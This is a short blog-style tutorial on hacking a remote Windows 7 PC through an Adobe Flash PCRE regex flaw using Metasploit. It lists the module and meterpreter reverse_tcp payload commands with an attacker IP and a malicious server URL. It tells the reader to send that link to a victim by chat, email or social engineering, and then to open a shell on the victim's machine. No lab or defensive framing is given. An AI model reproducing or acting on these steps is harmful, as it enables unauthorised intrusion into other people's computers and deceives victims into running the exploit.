Hack Remote Windows PC using Adobe Flash Player PCRE Regex Vulnerability

This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_pcre
msf exploit (adobe_flash_pcre)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_pcre)>set lhost 192.168.1.11 (IP of Local Host)
msf exploit (adobe_flash_pcre)>set srvhost 192.168.1.11
msf exploit (adobe_flash_pcre)>set uripath /
msf exploit (adobe_flash_pcre)>exploit


Now an URL you should give to your victim http://192.168.1.11:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.11:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

0 comments:

Post a Comment